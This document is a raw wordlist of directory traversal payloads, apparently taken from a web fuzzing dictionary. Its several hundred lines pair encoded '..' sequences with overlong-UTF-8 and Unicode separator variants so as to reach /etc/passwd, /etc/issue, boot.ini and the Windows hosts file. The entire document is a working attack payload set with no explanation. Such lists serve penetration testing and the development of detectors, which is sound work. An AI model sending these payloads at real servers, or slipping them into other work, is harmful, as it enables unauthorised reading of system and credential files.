-0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcetc%c1%pcpasswd -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcetc%c1%pcissue -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcboot.ini -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcetc%c1%pcpasswd -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcetc%c1%pcissue -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcboot.ini -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcetc%c1%pcpasswd -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcetc%c1%pcissue -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcboot.ini -0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pc0x2e0x2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -0x2e0x2e%c0%9vetc%c0%9vpasswd -0x2e0x2e%c0%9vetc%c0%9vissue -0x2e0x2e%c0%9vboot.ini -0x2e0x2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -0x2e0x2e%c0%9v0x2e0x2e%c0%9vetc%c0%9vpasswd -0x2e0x2e%c0%9v0x2e0x2e%c0%9vetc%c0%9vissue -0x2e0x2e%c0%9v0x2e0x2e%c0%9vboot.ini -0x2e0x2e%c0%9v0x2e0x2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vetc%c0%9vpasswd -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vetc%c0%9vissue -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vboot.ini -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vetc%c0%9vpasswd -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vetc%c0%9vissue -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vboot.ini -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vetc%c0%9vpasswd -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vetc%c0%9vissue -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vboot.ini -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vetc%c0%9vpasswd -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vetc%c0%9vissue -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vboot.ini -0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9v0x2e0x2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -0x2e0x2e%c0%qfetc%c0%qfpasswd -0x2e0x2e%c0%qfetc%c0%qfissue -0x2e0x2e%c0%qfboot.ini -0x2e0x2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -0x2e0x2e%c0%qf0x2e0x2e%c0%qfetc%c0%qfpasswd -0x2e0x2e%c0%qf0x2e0x2e%c0%qfetc%c0%qfissue -0x2e0x2e%c0%qf0x2e0x2e%c0%qfboot.ini -0x2e0x2e%c0%qf0x2e0x2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfetc%c0%qfpasswd -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfetc%c0%qfissue -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfboot.ini -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfetc%c0%qfpasswd -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfetc%c0%qfissue -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfboot.ini -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfetc%c0%qfpasswd -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfetc%c0%qfissue -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfboot.ini -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfetc%c0%qfpasswd -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfetc%c0%qfissue -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfboot.ini -0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qf0x2e0x2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -0x2e0x2e%c1%8setc%c1%8spasswd -0x2e0x2e%c1%8setc%c1%8sissue -0x2e0x2e%c1%8sboot.ini -0x2e0x2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -0x2e0x2e%c1%8s0x2e0x2e%c1%8setc%c1%8spasswd -0x2e0x2e%c1%8s0x2e0x2e%c1%8setc%c1%8sissue -0x2e0x2e%c1%8s0x2e0x2e%c1%8sboot.ini -0x2e0x2e%c1%8s0x2e0x2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8setc%c1%8spasswd -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8setc%c1%8sissue -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8sboot.ini -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8setc%c1%8spasswd -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8setc%c1%8sissue -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8sboot.ini -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8setc%c1%8spasswd -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8setc%c1%8sissue -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8sboot.ini -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8setc%c1%8spasswd -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8setc%c1%8sissue -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8sboot.ini -0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8s0x2e0x2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -0x2e0x2e%c1%1cetc%c1%1cpasswd -0x2e0x2e%c1%1cetc%c1%1cissue -0x2e0x2e%c1%1cboot.ini -0x2e0x2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -0x2e0x2e%c1%1c0x2e0x2e%c1%1cetc%c1%1cpasswd -0x2e0x2e%c1%1c0x2e0x2e%c1%1cetc%c1%1cissue -0x2e0x2e%c1%1c0x2e0x2e%c1%1cboot.ini -0x2e0x2e%c1%1c0x2e0x2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cetc%c1%1cpasswd -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cetc%c1%1cissue -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cboot.ini -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cetc%c1%1cpasswd -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cetc%c1%1cissue -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cboot.ini -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cetc%c1%1cpasswd -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cetc%c1%1cissue -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cboot.ini -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cetc%c1%1cpasswd -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cetc%c1%1cissue -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cboot.ini -0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1c0x2e0x2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -0x2e0x2e%c1%afetc%c1%afpasswd -0x2e0x2e%c1%afetc%c1%afissue -0x2e0x2e%c1%afboot.ini -0x2e0x2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -0x2e0x2e%c1%af0x2e0x2e%c1%afetc%c1%afpasswd -0x2e0x2e%c1%af0x2e0x2e%c1%afetc%c1%afissue -0x2e0x2e%c1%af0x2e0x2e%c1%afboot.ini -0x2e0x2e%c1%af0x2e0x2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afetc%c1%afpasswd -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afetc%c1%afissue -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afboot.ini -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afetc%c1%afpasswd -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afetc%c1%afissue -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afboot.ini -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afetc%c1%afpasswd -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afetc%c1%afissue -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afboot.ini -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afetc%c1%afpasswd -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afetc%c1%afissue -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afboot.ini -0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%af0x2e0x2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -0x2e0x2e%bg%qfetc%bg%qfpasswd -0x2e0x2e%bg%qfetc%bg%qfissue -0x2e0x2e%bg%qfboot.ini -0x2e0x2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -0x2e0x2e%bg%qf0x2e0x2e%bg%qfetc%bg%qfpasswd -0x2e0x2e%bg%qf0x2e0x2e%bg%qfetc%bg%qfissue -0x2e0x2e%bg%qf0x2e0x2e%bg%qfboot.ini -0x2e0x2e%bg%qf0x2e0x2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfetc%bg%qfpasswd -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfetc%bg%qfissue -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfboot.ini -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfetc%bg%qfpasswd -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfetc%bg%qfissue -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfboot.ini -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfetc%bg%qfpasswd -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfetc%bg%qfissue -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfboot.ini -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfetc%bg%qfpasswd -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfetc%bg%qfissue -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfboot.ini -0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qf0x2e0x2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -0x2e0x2e%u2215etc%u2215passwd -0x2e0x2e%u2215etc%u2215issue -0x2e0x2e%u2215boot.ini -0x2e0x2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -0x2e0x2e%u22150x2e0x2e%u2215etc%u2215passwd -0x2e0x2e%u22150x2e0x2e%u2215etc%u2215issue -0x2e0x2e%u22150x2e0x2e%u2215boot.ini -0x2e0x2e%u22150x2e0x2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215etc%u2215passwd -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215etc%u2215issue -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215boot.ini -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215etc%u2215passwd -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215etc%u2215issue -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215boot.ini -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215etc%u2215passwd -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215etc%u2215issue -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215boot.ini -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215etc%u2215passwd -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215etc%u2215issue -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215boot.ini -0x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u22150x2e0x2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -0x2e0x2e%u2216etc%u2216passwd -0x2e0x2e%u2216etc%u2216issue -0x2e0x2e%u2216boot.ini -0x2e0x2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -0x2e0x2e%u22160x2e0x2e%u2216etc%u2216passwd -0x2e0x2e%u22160x2e0x2e%u2216etc%u2216issue -0x2e0x2e%u22160x2e0x2e%u2216boot.ini -0x2e0x2e%u22160x2e0x2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216etc%u2216passwd -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216etc%u2216issue -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216boot.ini -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216etc%u2216passwd -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216etc%u2216issue -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216boot.ini -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216etc%u2216passwd -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216etc%u2216issue -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216boot.ini -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216etc%u2216passwd -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216etc%u2216issue -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216boot.ini -0x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u22160x2e0x2e%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -0x2e0x2e%uEFC8etc%uEFC8passwd -0x2e0x2e%uEFC8etc%uEFC8issue -0x2e0x2e%uEFC8boot.ini -0x2e0x2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -0x2e0x2e%uEFC80x2e0x2e%uEFC8etc%uEFC8passwd -0x2e0x2e%uEFC80x2e0x2e%uEFC8etc%uEFC8issue -0x2e0x2e%uEFC80x2e0x2e%uEFC8boot.ini -0x2e0x2e%uEFC80x2e0x2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8etc%uEFC8passwd -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8etc%uEFC8issue -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8boot.ini -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8etc%uEFC8passwd -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8etc%uEFC8issue -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8boot.ini -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8etc%uEFC8passwd -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8etc%uEFC8issue -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8boot.ini -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8etc%uEFC8passwd -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8etc%uEFC8issue -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8boot.ini -0x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC80x2e0x2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts -0x2e0x2e%uF025etc%uF025passwd -0x2e0x2e%uF025etc%uF025issue -0x2e0x2e%uF025boot.ini -0x2e0x2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -0x2e0x2e%uF0250x2e0x2e%uF025etc%uF025passwd -0x2e0x2e%uF0250x2e0x2e%uF025etc%uF025issue -0x2e0x2e%uF0250x2e0x2e%uF025boot.ini -0x2e0x2e%uF0250x2e0x2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025etc%uF025passwd -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025etc%uF025issue -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025boot.ini 